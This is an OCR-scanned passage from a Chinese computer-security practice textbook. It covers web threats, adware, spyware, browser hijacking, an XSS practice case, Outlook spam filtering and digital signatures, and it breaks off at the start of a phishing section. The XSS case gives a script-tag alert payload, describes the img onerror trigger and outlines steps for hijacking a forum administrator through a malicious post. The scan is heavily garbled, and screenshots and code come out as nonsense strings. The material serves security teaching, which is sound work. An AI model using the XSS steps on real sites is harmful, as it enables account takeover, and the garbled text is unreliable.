型 . 何 种 资源 属性 以 及 怎样 的 风险 级 别 等 等 ,与 应 用 过 滤器 形成 完美 配合 。 同 时 通过 特征 
码 ,指定 出 应 用 在 包 长 度 . 服 务 端口 .连接 方式 甚至 于 特征 字符 串 / 数 字 串 等 等 方面 的 数据 
特征 ,多 种 方式 灵活 组 合 ,并 可 依 需 要 无 限度 扩展 ,涵盖 了 学 习 、 辨 识 一 个 新 应 用 的 所 有 特 
征 因素 ,从 而 第 一 时 间 让 所 有 已 有 的 或 未 来 将 有 的 未 知 应 用 无 处 通 形 ,完全 掌握 于 控制 
之 中 。 


6.8 课 后 体 合 与 练习 


.黑客 攻击 的 基本 步骤 有 哪些 ? 

.什么 是 端口 ? 端口 漏洞 会 带 来 哪些 危害 ? 如 何 发 现 端口 漏洞 ? 

.DDoS 的 攻击 形式 主要 有 哪些 ? 

.防火 墙 的 作用 有 哪些 ? 配置 防火 墙 的 时 候 一 般 要 配置 哪些 功能 ? 


E wuye 
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亏本 章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 : 

。 查找 Web 应 用 的 相关 技术 与 具体 应 用 场景 ; 
。 了 解 应 用 安全 的 具体 作用 。 

s 本 章 教学 目标 

本 章 的 教学 目标 是 : 

。 学 习 和 掌握 常用 的 应 用 安全 技术 ; 

。 了 解 典 型 的 应 用 安全 防护 措施 。 
亏本 章 教学 要 点 

本 章 的 教学 要 点 包括 : 

* Web 典型 应 用 的 常规 实践 ; 

。 常规 应 用 安全 防护 手段 。 

亏本 章 教学 建议 

。 本 章 内 容 建 议 采用 实践 案例 引导 模式 进行 教学 。 


7.1 应 用 安全 技术 基础 


目前 ,全 球 互 联网 用 户 已 超过 15 亿 , 大 部 分 用 户 也 都 会 利用 网 络 进行 购物 ,银行 转账 


支付 和 各 种 软件 下 载 。 而 近年 来 互联 网 的 环境 发 生 很 大 的 变化 , Web 2. 


0 成 为 互联 网 热 


门 的 概念 ,Web 2. 0 相关 技术 和 应 用 的 发 展 使 得 在 线 协作 、 共 享 更 加 方便 。Web 2.0 技术 
主要 包括 博客 (BLOG) ,播客 ,RSS、 百 科 全 书 (Wiki) ,P2P 和 即时 信息 (IM) 等 。 人 们 在 享 


受 网 络 带 来 的 便捷 同时 ,网 络 环境 也 变 得 越 来 越 危险 。 


Web 威胁 正在 极力 表现 它 的 逐 利 性 ,这 一 点 成 为 当前 网 络 威胁 最 突出 的 代表 。 近 年 
来 类 似 Melissa, I Love You 等 这 些 扩散 全 球 的 “大 ”病毒 届 指 可 数 ,取而代之 的 是 无 声 无 


息 的 Web 威胁 ,他 们 共同 的 特性 是 窍 取 数据 加 以 贩卖 。 在 中 国 本 土 更 发 


毒 ,如 熊猫 烧香 、 灰 伴 子 和 ANI 蠕虫 。 


展 出 区 域 性 的 病 


由 于 新 一 代 的 Web 威胁 具备 混合 型 .定向 攻击 和 区 域 性 爆发 等 特点 ,所 以 传统 防护 
效果 越 来 越 差 , 难 防 Web 威胁 。 因 此 ,普通 的 浏览 网 页 都 变 成 了 一 件 带 有 极 大 安全 风险 
的 事情 。Web 威胁 可 以 在 用 户 完全 没有 察觉 的 情况 下 进入 网 络 ,从 而 对 公司 数据 资产 、 
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行业 信誉 和 关键 业务 构成 极 大 威胁 。 据 Gartner 统计 ,到 2009 年 ,企业 由 于 定向 攻击 遭 
受 的 损失 将 至 少 5 倍 于 其 他 事件 造成 的 损失 。 而 面 对 Web 威胁 ,传统 的 安全 防护 手段 已 
经 不 能 满足 保护 网 络 的 要 求 。 

1. 网 页 防 篡改 系统 

网 页 防 算 改 系统 实时 监控 Web 站 点 , 当 Web 站 点 上 的 文件 受到 破坏 时 ,能 迅速 恢复 
被 破坏 的 文件 ,并 及 时 将 报告 提交 给 系统 管理 员 ,从 而 保护 Web 站 点 的 数据 安全 。 

2. 网 页 内 容 过 滤 技 术 

Web 页 面 内 容 过 滤 系 统 通过 对 网 络 信息 流 中 的 内 容 进行 过 滤 和 分 析 , 实 现 对 网 络 用 
户 浏览 或 传送 非法 .黄色 和 反动 等 敏感 信息 进行 监控 和 封杀 。 同 时 通过 强大 的 用 户 管理 
功能 ,实现 对 用 户 的 分 组 管理 .分 时 管理 和 分 内 容 管理 。 

3. 实时 信息 过 滤 

实时 信息 过 滤 系 统 就 是 通过 对 企业 内 部 网 络 状况 的 监控 ,对 企业 内 部 的 即时 短 消息 
(如 MSN ICQ ,雅虎 通 等 ) 的 通信 和 点 对 点 的 软件 通信 进行 多 方式 的 管理 。 

4. 广告 软件 

广告 软件 (Adware) 是 指 未 经 用 户 允 许 , 下 载 并 安装 或 与 其 他 软件 拥 绑 通过 弹出 式 广 
告 或 以 其 他 形式 进行 商业 广告 宣传 的 程序 。 安 装 广告 软件 之 后 ,往往 造成 系统 运行 缓慢 

5. 间谍 软件 

间谍 软件 (Spyware) 是 能 够 在 使 用 者 不 知情 的 情况 下 ,在 用 户 电 脑 上 安装 后 门 程序 
的 软件 。 用 户 的 隐私 数据 和 重要 信息 会 被 那些 后 门 程序 捕获 ,甚至 这 些 后 门 程序 还 能 使 
黑客 远程 操纵 用 户 的 电脑 。 

为 了 防止 广告 软件 和 间谍 软件 ,应 采用 安全 性 比较 好 的 网 络 浏览 器 ,并 注意 弥补 系统 
漏洞 ,不 要 轻易 安装 共享 软件 或 “免费 软件 ”, 这 些 软件 往往 含有 广告 程序 .间谍 软件 等 不 
良 软件 ,可 能 带 来 安全 风险 ,同时 也 不 要 浏览 不 良 网 站 。 

6. 浏览 器 动 持 

浏览 器 劫持 是 一 种 恶意 程序 ,通过 DLL ffifF BHO 或 Winsock LSP 等 形式 对 用 户 
的 浏览 器 进行 算 改 ,使 用 户 浏 览 器 出 现 访问 正常 网 站 时 被 转向 到 恶意 网 页 、IE 浏览 器 主 
页 /搜索 页 等 被 修改 为 劫持 软件 指定 的 网 站 地 址 等 异常 。 浏 览 器 劫持 分 为 多 种 不 同 的 方 
式 , 从 最 简单 的 修改 TE. 默认 搜索 页 到 最 复杂 的 通过 病毒 修改 系统 设置 并 设置 病毒 守护 进 
程 ,劫持 浏览 器 。 为 了 防止 浏览 器 被 劫持 ,建议 使 用 安全 性 能 比较 高 的 浏览 器 ,并 可 以 针 
对 自己 的 需要 对 浏览 器 的 安全 设置 进行 相应 调整 ,如果 给 浏览 器 安装 插件 ,尽量 从 浏览 器 
提供 商 的 官方 网 站 下 载 。 另 外 ,不 要 轻易 浏览 不 良 网 站 ,不 要 轻易 安装 共享 软件 、 盗 版 
软件 。 

7. 恶意 共享 软件 

恶意 共享 软件 (Malicious Shareware) 是 指 采 用 不 正当 的 捆绑 或 不 透明 的 方式 强制 安 
装 在 用 户 的 计算 机 上 ,并 且 利 用 一 些 病毒 常用 的 技术 手段 造成 软件 很 难 被 卸载 ,或 采用 一 
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些 非 法 手段 强制 用 户 购买 的 免费 、 共 享 软 件 。 


M 
N 
» 


实践 案例 7-1: 跨 站 攻击 技术 


1. 什么 是 跨 站 攻击 

XSS X fft CSS(Cross Site Script) , 即 跨 站 脚本 攻击 , 它 指 
面 里 插入 恶意 代码 , 当 用 户 浏 览 该 页 之 时 , 藤 入 Web 里 面 的 恶 
攻击 者 的 特殊 目的 ,XSS 属于 被 动 式 的 攻击 。 

2. XSS 跨 站 脚本 攻击 原理 

建立 一 个 名 为 xss_test. html 的 文件 ,如 图 7. 1 所 示 。 在 IE 中 打开 xss_test. html X. 
件 ,可 以 看 到 如 图 7. 2 所 示 的 窗口 。 


的 是 恶意 攻击 者 向 Web 页 
意 代码 会 被 执行 ,从 而 达到 


THER YS DoR 
文件 下 ) RED 格式 @) FEV WHW 


Microsoft Internet E... EBR) 
O SED SEV KEA IAD 8" 


<html> F 

<head> O=- O- i2idc ^s 

<title> — —— MÀ 
xss test 

</title> 

<h1> xss (AiR? </h1><hr> 


ly» 
«a nrer-"(TYTEPZLTTERETIT ROUTE? > 搜狐 新 闻 主 页 </a> 
</body> 
</html> 


图 7.2 IE 中 打开 xss test. html 文件 


修改 xss test. html 的 文件 ,如 图 7. 3 所 示 。 在 IE 中 打开 xss_test. html 文件 ,可 以 
看 到 如 图 7.4 所 示 的 窗口 。 


P xss_test-htal - 


REO 格式 Q) FEV 帮助 00) 


图 7.3 修改 后 的 xss test. html 文件 


3. XSS 跨 站 脚本 的 触发 条 件 
1) 完整 的 脚本 标记 
在 某 个 表单 提交 内 容 时 ,可 以 构造 特殊 的 值 闭合 标记 来 构造 完整 无 错 的 脚本 标记 ,如 
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图 7. 5 所 示 ,提交 的 内 容 是 : "T — scriptalert(xss) ; </script> <". 


rss_test — Nicrosoft Internet Exp... |- |D|X 
文件 FE) RED SEV HRW IAV W” NY 


Q-9ig« s 


» 


Be ss 


图 7.4 IE 中 打开 xss test. html 文件 


P xss_test-htal - 记事 本 


图 7.5 构造 脚本 标记 


2) 触发 事件 

触发 事件 是 指 只 有 达到 某 个 条 件 才 会 引发 的 事件 ,img 标记 有 一 个 可 以 利用 的 
onerror() 事 件 , 当 img 标记 含有 onerror() 事 件 并 且 图 片 没有 正常 输出 时 便 会 触发 该 事 
件 , 该 事件 中 可 以 加 入 任意 的 脚本 代码 ,执行 后 的 结果 如 图 7.6 所 示 。 


xss_test - Firefox - UII 
Xt SED SEV IG i 


图 7.6 Firefox 中 打开 xss test. html 文件 
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4. XSS 跨 站 入 侵 步 又 

CD 第 一 步 : 在 某 个 论坛 注册 一 个 普通 用 户 。 

(2) 第 二 步 : 寻找 XSS 漏洞 。 

(3) 第 三 步 : 发 帖子 ,等 待 管理 员 浏 览 该 帖子 。 如 果 管 理 员 浏 览 该 帖子 ,那么 就 实现 
T XSS 跨 站 入 侵 。 


7.3 实践 案例 7-2: 电子 邮件 安全 配置 


垃圾 邮件 是 仅 次 于 病毒 的 互联 网 公害 .但 由 于 无 法 可 依 或 者 说 有 不 完善 的 法 律 可 依 ， 
再 加 上 其 本 身 的 复杂 性 ,已 成 为 各 国电 子 邮件 用 户 一 个 很 头疼 的 事情 。 尽 管 安全 厂商 已 
经 和 垃圾 邮件 进行 了 长 期 的 斗争 ,但 垃圾 邮件 并 没有 明显 地 减少 。 

1. 什么 是 垃圾 邮件 

中 国 互联 网 协会 2003 年 3 月 25 日 通过 的 反 垃圾 邮件 规范 对 垃圾 邮件 的 定义 如 下 。 

CD 收 件 人 事先 没有 提出 要 求 或 者 同意 接收 的 广告 .电子 刊物 和 各 种 形式 的 宣传 品 
等 宣传 性 的 电子 邮件 。 

(2) 收 件 人 无 法 拒 收 的 电子 邮件 。 

(3) 隐藏 发 件 人 身份 .地 址 和 标题 等 信息 的 电子 邮件 。 

(4) 含有 虚假 的 信息 源 .发 件 人 和 路 由 等 信息 的 电子 邮件 。 

2. 垃圾 邮件 的 危害 性 

CD 用 了 大 量 网 络 带宽 ,使 得 邮件 服务 器 的 CPU 时 间 大 量 消耗 在 接收 垃圾 邮件 方 
面 ,甚至 还 有 可 能 造成 邮件 服务 器 拥塞 ,因此 大 大 降低 整个 网 络 的 运行 效率 。 

C2) 垃圾 信息 导致 电子 邮件 使 用 率 降低 。 最 新 统计 显示 ,超过 60% 的 人 由 于 垃圾 信 
息 的 泛滥 而 减少 电子 邮件 的 使 用 次 数 。 

(3) 滥 发 的 垃圾 邮件 不 仅 侵犯 收 件 人 的 隐私 权 及 占用 宝贵 的 信箱 空间 ,同时 还 在 删 
除 垃圾 邮件 方面 耗费 了 收 件 人 的 时 间 、 精 力 和 人 金钱。 而 且 有 些 垃圾 邮件 还 盗用 他 人 的 电 
子 邮件 地 址 作为 发 信 地 址 ,这 样 就 严重 损害 了 他 人 的 信誉 。 

C. 成 为 病毒 .木马 程序 的 载体 ,影响 计算 机 的 正常 使 用 。 

(5) 被 黑客 利用 ,采用 邮件 炸弹 的 手段 对 网 络 进行 攻击 。 

(6) 严重 影响 公司 的 服务 形象 。 如 果 别 人 频繁 地 使 用 一 个 邮件 地 址 给 你 发 送 垃圾 邮 
件 ,那么 你 肯定 不 会 对 提供 这 个 邮件 服务 的 公司 有 好 感 。 

(7) 垃圾 邮件 宣传 的 多 半 是 各 种 广告 及 非法 言论 ,轻信 这 些 虚假 广告 会 给 我 们 带 来 
经 济 损失 ,而 且 带 有 色情 .反动 等 内 容 的 垃圾 邮件 已 经 对 现实 社会 造成 了 极 大 的 危害 。 

3. 避免 垃圾 邮件 的 几 种 方法 


(1) 至 少 拥 有 两 个 电子 邮箱 地 址 ,一 个 是 私人 邮箱 地 址 , 另 一 个 是 公共 邮箱 地 址 。 私 
人 邮箱 地 址 用 于 个 人 的 通信 ,不 要 将 自己 的 邮箱 地 址 到 处 传播 ;公共 邮箱 地 址 用 于 一 些 公 
共 论 坛 和 聊天 室 注册 等 。 
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(2) 如 果 私 人 邮箱 地 址 被 垃圾 邮件 制造 者 知道 ,那么 就 需要 再 申请 一 个 新 邮箱 。 

(3) 不 要 回应 垃圾 邮件 。 

(4) 不 要 单 击 来 自 可 疑 网 站 的 订阅 链接 。 

(5) 可 以 用 Outlook 或 Foxmail 等 POP3 收 信和 工具 收取 电子 邮件 。 在 收 信 时 ,一 旦 
看 见 新 邮件 的 数量 超过 平时 数量 的 若干 倍 ,应 当 马上 停止 下 载 邮 件 , 然 后 再 从 服务 器 删除 
炸弹 邮件 。 

4. 实例 : 垃圾 邮件 的 处 理 


D 电子 邮件 盖 邮 玲 

在 Outlook 中 ,每 发 送 一 封 电子 邮件 ,都 会 为 该 电子 邮件 加 盖 邮 惟 。 这 个 邮戳 具 有 这 
封 邮件 的 各 个 唯一 性 的 特征 ,譬如 收 件 人 列表 和 发 送 时 间 等 。 我 们 使 用 Outlook 2007 等 
电子 邮件 程序 接收 电子 邮件 的 时 候 , 它 就 通过 邮戳 来 识别 垃圾 邮件 ,这样 就 会 有 效 地 降低 
收 到 垃圾 邮件 的 概率 。 并 且 由 于 给 电子 邮件 加 盖 邮 和 蕉 需要 更 多 的 处 理 时 间 , 所 以 如 果 发 
送 大 量 的 邮件 的 话 那 将 非常 耗 时 ,这 也 不 利于 垃圾 邮件 的 发 送 。 

给 电子 邮件 加 盖 邮 戳 的 具体 实施 方法 是 : 单 击 窗口 “工具 ?菜单 中 的 “选项 "命令 ,在 
弹出 的 对 话 框 中 选择 “首选 参数 "选项 卡 ,然后 单 击 “ 电 子 邮件 ?下 的 "垃圾 电子 邮件 ”按钮 ， 
选中 如 图 7. 7 中 的 “发 送 电子 邮件 时 ,为 邮件 盖 上 邮戳 以 帮助 电子 邮件 客户 端 区 分 普通 邮 
件 和 垃圾 电子 邮件 ”, 单 击 “ 确 定 ” 关 闭 对 话 框 就 可 以 了 。 


BA [ 朗 全 发 件 人 安全 忆 件 人 
R 中 UNFED HARSEN “OR” X 


选择 垃圾 邮 件 保护 级 别 
Maec 来 自 阻止 发 件 人 的 邮件 仍 村 被 移动 到 “ donar 


E ERRHDETHREUH F” TRER] 
SRROPSCEDU quent enne. 


Eo oa n O RR o AT 


ap， 而 不 是 将 其 移动 到 “垃圾 邮件 ” 


贺 禁 用 网 络 仿冒 邮件 中 的 树 接 和 其 他 功能 ) 。 (推荐 ) 
贺 对 电子 邮件 地 址 中 的 可 竹 域 名 发 出 警告 和 。 (推荐 ) 


CE RD 
图 7.7 邮件 改选 项 


发 送 电子 邮件 时 ,为 邮件 盖 上 邮戳 以 帮助 电子 邮件 客户 端 区 分 普通 邮件 和 垃圾 电子 
邮件 。 

2) 设置 安全 发 件 人 

我 们 也 可 以 通过 设置 “安全 发 件 人 ?来 阻止 垃圾 邮件 ,操作 方法 是 : 按 上 面 介绍 的 方 
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法 打开 如 图 7. 8 所 示 的 “安全 发 件 人 ”选项 卡 , 选 中 “同时 信任 来 自我 的 联系 人 的 电子 邮 
件 ” 复 选项 。 这 样 以 后 只 要 不 是 来 自 联系 人 的 电子 邮件 都 会 被 Outlook 判别 为 垃圾 邮件 。 


F - yanbing9120126.com = 
aa 安全 发 件 人 
FI RII 


| GS... | 
C Suo 


输入 要 添加 到 该 列表 的 电子 邮件 地 址 或 Internet 域名 。 
8125. coal 


示例 : soneoneBexanple. con 或 Gexample. 


Ce) 


EBRIIRIEREEHEBSEUR A Br T PE O 
FI 自动 添加 来 自 安全 发 件 人 名 单 的 发 件 人 QD 


Ee ln 


图 7.8 添加 安全 发 件 人 


这 个 方法 虽然 安全 ,但 是 我 们 不 可 能 将 所 有 的 联系 人 都 一 下 子 添加 过 来 ,所 以 有 的 时 
候 明明 不 是 垃圾 邮件 , 却 因为 联系 人 的 问题 而 被 Outlook 判断 为 垃圾 邮件 ,这 个 可 以 单 击 
如 图 7.8 中 的 “添加 ”按钮 打开 对 话 框 ,在 * 添 加 地 址 或 域 " 框 中 输入 电子 邮件 地 址 。 因 为 
全 球 电子 邮件 服务 商都 会 采取 预防 垃圾 邮件 的 措施 ,所 以 大 量 垃圾 邮件 一 般 采 用 隐秘 的 
服务 器 发 送 , 采 用 公开 服务 器 发 送 垃圾 邮件 的 可 能 性 很 小 。 因 此 可 以 将 @vip. sina. com 
等 域名 加 入 如 图 7. 8 对 话 框 ,这 样 来 自 vip. sina. com 等 公开 服务 器 的 邮件 就 不 会 被 识别 
为 垃圾 邮件 了 。 

除了 “安全 发 件 人 "以 外 ,如 图 7. 8 所 示 对 话 框 还 提供 了 其 他 三 个 选项 卡 。 列 入 “安全 
收 件 人 ”选项 卡 中 的 地 址 或 域名 的 电子 邮件 不 会 作为 垃圾 处 理 , 列 入 “阻止 发 件 人 ”选项 卡 
中 的 地 址 或 域 的 电子 邮件 始终 当 作 垃圾 处 理 ,使 用 “国际 ”选项 卡 可 以 将 来 自 某 一 顶级 域 
或 使 用 某 一 字符 集 的 邮件 标记 为 垃圾 邮件 。 

3) 收 到 邮件 设防 线 

尽管 Outlook 采取 了 比较 严密 的 预防 措施 ,个 别 垃圾 邮件 还 是 有 可 能 注 进 来 。 为 此 
可 以 针对 不 同 邮 件 完善 “安全 发 件 人 ”等 防线 。 右 击 “ 收 
件 箱 "中 的 邮件 ,打开 快捷 菜单 中 的 “垃圾 邮件 " 子 菜单 ， 2 
根据 需要 在 如 图 7. 9 所 示 菜 单 中 选择 合适 的 命令 : 将 “| WRAD 
发 件 人 添加 到 "阻止 发 件 人 名 单 "之 后 ,来 自 该 地 址 的 邮 | Inno 
件 均 被 视 为 垃圾 邮件 。 将 发 件 人 添加 到 “安全 发 件 人 名 “| 局 meno 
单 ? 以 后 ,来自 该 地 址 的 邮件 永远 不 会 视 为 垃圾 电子 邮 图 7.9 设置 安全 发 件 人 
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件 。 将 发 件 人 的 域 添加 到 “安全 发 件 人 名 单 " 以 后 ,来 自 该 域 的 邮件 永远 不 会 视 为 垃圾 电 
子 邮件 。 

4) 查看 邮件 头 防 垃圾 

对 于 经 常 接收 大 量 邮件 的 用 户 来 说 ,可 以 选择 下 载 某 个 邮箱 中 的 邮件 头 , 初 步 筛选 做 
出 标记 再 下 载 , 有 助 于 甄别 和 预防 垃圾 邮件 。 有 具体 操作 方法 是 : 单 击 “工具 ”一 发送 和 接 
收 ”>“ 仅 x XxX”(X X 是 邮箱 名 称 ) 子 菜单 下 的 “下 载 收 件 箱 邮 件 头 ”命令 ,就 可 以 将 邮箱 中 
的 邮件 头 下 载 到 收 件 箱 中 。 

待 邮件 头 查 看 完毕 双击 ,就 可 以 打开 如 图 7. 10 所 示 对 话 框 选择 如 何 处 理 邮件 了 。 当 
所 有 邮件 头 查 看 并 处 理 完毕 之 后 , 单 击 “ 工 具 ”>“ 发 送 和 接收 ”>“ 仅 X xX”(X XxX 是 邮箱 名 
称 ) 子 菜单 下 的 “处 理 以 标记 的 邮件 头 ” 命 令 ,就 按照 选择 的 方式 处 理 邮 件 了 。 


1 所 有 帐户 组 
2 仅 "yanbingB120126.com" » 


T ERRO.. 
禁用 定期 发 送 /接收 (D) 


图 7.10 下 载 邮 件 头 


如 果 用 户 在 Outlook 设置 多 个 邮箱 , 单 击 * 工 具 ” 一 发送 和 接收 ? 子 菜单 下 的 “下 载 此 
文件 夹 中 的 邮件 头 ” 命 令 , 就 可 以 下 载 所 有 邮箱 中 的 邮件 头 。 下 载 完毕 按 上 面 介绍 的 方法 
处 理 以 后 , 单 击 “ 工 具 ” 一 “发 送 和 接收 ”" 子 菜单 下 的 “处 理 此 文件 夹 中 已 标记 的 邮件 头 ” 命 
令 ,就 可 以 按照 选择 的 方式 处 理 所 有 邮箱 中 的 邮件 了 。 


7.4 实践 案例 7-3: 数字 签名 技术 


要 想 了 解数 字 签 名 ,应 从 电子 签名 开始 。 要 理解 什么 是 电子 签名 ,需要 从 传统 手工 签 
名 或 盖 印 章 谈 起 。 在 传统 商务 活动 中 ,为 了 保证 交易 的 安全 与 真实 ,一 份 书 面 合 同 或 公文 
要 由 当事人 或 其 负责 人 签字 、` 盖 章 , 以 便 让 交易 双方 甄别 是 谁 签 的 合同 ,保证 签字 或 盖 章 
的 人 认可 合同 的 内 容 , 在 法 律 上 才能 承认 这 份 合同 是 有 效 的 。 而 在 电子 商务 的 虚拟 世界 
中 ,合同 或 文件 是 以 电子 文件 的 形式 表现 和 传递 的 。 在 电子 文件 上 ,传统 的 手写 签名 和 盖 
章 是 无 法 进行 的 ,这 就 必须 依靠 技术 手段 来 营 代 。 能 够 在 电子 文件 中 甄别 双方 交易 人 的 
真实 身份 ,保证 交易 的 安全 性 和 真实 性 以 及 不 可 抵赖 性 ,起 到 与 手写 签名 或 者 盖 章 同等 作 
用 的 签名 的 电子 技术 手段 , 称 为 电子 签名 。 从 法 律 上 讲 , 签 名 有 两 个 功能 , 即 标记 签名 人 
和 表示 签名 人 对 文件 内 容 的 认可 。 联 合 国贸 发 会 的 (电子 签名 示范 法 》 中 对 电子 签名 做 如 
下 定义 ,“ 指 在 数据 电文 中 以 电子 形式 所 含 、 所 附 或 在 逻辑 上 与 数据 电文 有 联系 的 数据 , 它 
可 用 于 鉴别 与 数据 电文 相关 的 签名 人 和 表明 签名 人 认可 数据 电文 所 含 信息 ”; 在 欧盟 的 
《电子 签名 共同 框架 指令 ) 中 就 规定 ,“ 以 电子 形式 所 附 或 在 逻辑 上 与 其 他 电子 数据 相关 的 
数据 ,作为 一 种 判别 的 方法 ” 称 电子 答 名。 实现 电子 签名 的 技术 手段 有 很 多 种 ,但 目前 比 
较 成 熟 的 ,世界 先进 国家 普遍 使 用 的 电子 签名 技术 还 是 数字 签名 技术 。 由 于 保证 技术 中 
立 性 是 制定 法 律 的 一 个 基本 原则 ,目前 还 没有 任何 理由 说 明 公 钥 密码 理论 是 制作 签名 的 
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唯一 技术 ,因此 有 必要 规定 一 个 更 一 般 的 概念 以 适应 今后 技术 的 发 展 。 

同样 ,《 中 华人 民 共 和 国电 子 签名 法 》( 以 下 简称 (电子 签名 法 )) 中 提 到 的 签名 ,一 般 指 
的 就 是 数字 签名 。 所 谓 数字 签名 就 是 通过 某 种 密码 运算 生成 一 系列 符号 及 代码 组 成 电子 
密码 进行 签名 ,来 代替 书写 签名 或 印章 ,对 于 这 种 电子 式 的 签名 还 可 进行 技术 验证 ,其 验 
证 的 准确 度 是 一 般 手工 签名 和 图 章 的 验证 无 法 比拟 的 。 数 字 签 名 是 目前 电子 商务 .电子 
政务 中 应 用 最 普遍 、 技 术 最 成 熟 .可 操作 性 最 强 的 一 种 电子 签名 方法 。 它 采用 规范 的 程序 
和 科学 的 方法 ,用 于 鉴定 签名 人 的 身份 以 及 对 一 项 电子 数据 内 容 的 认可 。 它 还 能 验证 出 
文件 的 原文 在 传输 过 程 中 有 无 变动 ,确保 传输 电子 文件 的 完整 性 真实 性 和 不 可 抵赖 性 。 

数字 签名 在 ISO 7498-2 标准 中 定义 为 :“ 附 加 在 数据 单元 上 的 一 些 数据 ,或 是 对 数 
据 单元 所 做 的 密码 变换 ,这 种 数据 和 变换 允许 数据 单元 的 接收 者 用 以 确认 数据 单元 来 源 
和 数据 单元 的 完整 性 ,并 保护 数据 ,防止 被 人 (例如 接收 者 ) 进 行 伪 造 。” 美 国电 子 签名 标准 
(DSS,FIPS 186-2) 对 数字 签名 做 了 如 下 解释 :“ 利 用 一 套 规则 和 一 个 参数 对 数据 计算 所 
得 的 结果 ,用 此 结果 能 够 确认 签名 者 的 身份 和 数据 的 完整 性 ,” 按 上 述 定义 PRI 可 以 提供 
数据 单元 的 密码 变换 ,并 能 使 接收 者 判断 数据 来 源 及 对 数据 进行 验证 。 目 前 ,实现 电子 签 
名 的 技术 手段 有 很 多 种 ,前 提 是 在 确认 签署 者 的 确切 身份 即 经 过 认证 之 后 ,电子 签名 承认 
人 们 可 以 用 多 种 不 同 的 方法 签署 一 份 电子 记录 。 这 些 方法 有 : 基于 PKI 的 公 钥 密码 技术 
的 数字 签名 ;用 一 个 独一无二 的 以 生物 特征 统计 学 为 基础 的 甄别 标 讽 ,例如 手书 签名 和 图 
章 的 电子 图 像 的 模式 甄别 ;手印 声音 印记 或 视网膜 扫描 的 甄别 ;一 个 让 收 件 人 能 甄别 发 
件 人 身份 的 密码 代号 .密码 或 个 人 甄别 码 PIN ;基于 量子 力学 的 计算 机 等 。 

但 比较 成 熟 的 、 使 用 方便 具有 可 操作 性 的 、 在 世界 先进 国家 和 我 国 普遍 使 用 的 电子 签 
名 技术 还 是 基于 PKI 的 数字 签名 技术 。 所 以 ,就 现在 来 讲 , 电 子 签 名 就 是 数字 签名 。 

《电子 签名 法 》 中 规定 :“ 安 全 的 电子 签名 具有 与 手写 签名 或 者 盖 章 同等 的 效力 .” 

(1) Windows 2000/XP 中 安装 ChinaTCP 个 人 控件 数字 签名 系统 1. 00 软件 并 运 
行 ,如 图 7.11 所 示 。 


C- ChinaICP 个 人 控件 数字 签名 系统 


GSDARETS, EUER; 


在 自 娃 数字 证 书后 即 可 通过 数字 签名 向 导 提示 一 步 一 步 进 
sif) CKETSEGÉSFNER,ZTUTER, REN: 


件 即 可 在 网 上 发 布 ， 


名 的 控 您 可 以 通过 t 
REDE CER: CHEER C UH rA 因此 
有 安全 警 省 信息 。 


CopyRight ChinaTcp CDM» hitp//wwew chinaT cp com» Emal: ChinaTcp@HotMal com 


图 7.11 个 人 数字 签名 系统 界面 
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(2) 单 击 “ 创 建 数字 证 书 ” 按 钮 ,打开 “创建 数字 证 书 ” 对 话 框 ,如 图 7.12 所 示 。 在 “您 
的 姓名 ”文本 框 中 输入 “myca”, 单 击 “ 确 定 ” 按 钮 ,弹出 创建 证 书 成 功 提示 框 ,如 图 7. 13 
所 示 。 
E- ChinaICP 个 人 控件 数字 签名 系统 


Snia TOH AE ESEE 


€ 创建 数码 证 书 Ed 
EEUU din 
有 


数字 签名 向 导 


ORRERA 
一 | 


SEU we '£fi ce/redir. ice9/cert hta PAH 
数字 签名 实例 


帮助 中 心 


SelfCert 成 功 K 
aE 取消 一 
已 成 功 地 为 wyes 新 建 了 一 份 证 书 


CopyRight ChinaTcp COM » hitp://vwe.chinaTcp.com» Emal ChinaTcpGHolMal.com. 


图 7.12 创建 数字 证 书 对 话 框 图 7.13 成 功 创建 证 书 


(3) 单 击 “ 数 字 签 名 向 导 ” 按 钮 ,打开 “数字 签名 向 导 ” 对 话 框 ,如 图 7. 14 所 示 。 


欢迎 使 用 数字 签名 向 导 


这 个 向 导 帮 助 您 将 数字 签名 附加 到 文件 。 
数字 签名 核实 文件 没有 经 过 改动 。 


要 继续 ， 请 单 击 “下 一 步 ”。 


图 7.14 数字 签名 向 导 对 话 框 


CD 单 击 “下 一 步 ?按钮 ,打开 * 文 件 选择 "对话 框 ,选择 要 进行 数字 签名 的 文件 ,如 
图 7.15 所 示 。 

(5) 单 击 “下 一 步 ? 按 钮 ,进入 下 一 个 对 话 框 , 再 单 击 “下 一 步 ?按钮 ,再 单 击 “从 存储 
选择 ”按钮 ,在 弹出 的 “选择 证 书 ” 对 话 框 中 选择 一 个 证 书 ,如 图 7. 16 所 示 。 

(6) 单 击 “确定 ?按钮 回 到 “数字 签名 向 导 ?” 对 话 框 , 再 单 击 “下 一 步 ? 按 钮 ,打开 “数据 
描述 ”对 话 框 ,如 图 7. 17 所 示 。 


E 


153 


154 


计算 机 信息 安全 实践 教程 


Sir 
文件 选择 


由 您 选 择 要 经 过 数字 签名 的 文件 ， 


加 果 文 件 已 有 数字 签名 ， 则 会 被 新 的 签名 改写 


文件 各 外 ) 


[c \Documents and Settings WAdainistrator MEE safeedi tiz 


E 7.15 


[££—5 e)(r—5 a» > 


“文件 选择 "对 话 框 


2016-6-11 个 人 
2016-1 个 人 


a 


图 7.16 


数字 签名 向 导 
BEHE 


FEIRV 


“选择 证 书 ” 对 话 框 


您 可 以 添加 正在 签名 的 数据 的 描述 或 一 个 合 有 撕 述 的 Yeb 位 置 。 


或 者 键入 描述 ， 或 者 提供 指向 含有 描述 的 站 点 的 Web 地址。 


disk CRT QD 


支付 宝安 全 控件 


ro 位 置 阿 选 ) 人 0 


http: Verr. taobao con. 


E 7.17 


Czo) Cea 


“数据 描述 "对话 框 
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(7) 单 击 “ 下 一 步 "按钮 ,打开 “正在 完成 数字 签名 向 导 ” 对 话 框 ,如 图 7. 18 所 示 。 单 
击 “ 完 成 ”按钮 ,完成 数字 签名 。 


正在 完成 数字 签名 向 导 
已 成 功 完成 数字 签名 向 导 。 


C:\Documents and Settings\Adnini 
ayca 


内 容 信息 URL http: Vorw. taobao. com 
MARRS E> 


< 


图 7.18 完成 数字 签名 


7.5 实践 案例 7-5. 网 络 防 钧 鱼 技术 


1. 什么 是 网 络 钓鱼 

网 络 钓鱼 (Phishing) 是 诈骗 者 利用 欺骗 性 的 电子 邮件 和 伪造 的 Web 站 点 (钓鱼 网 
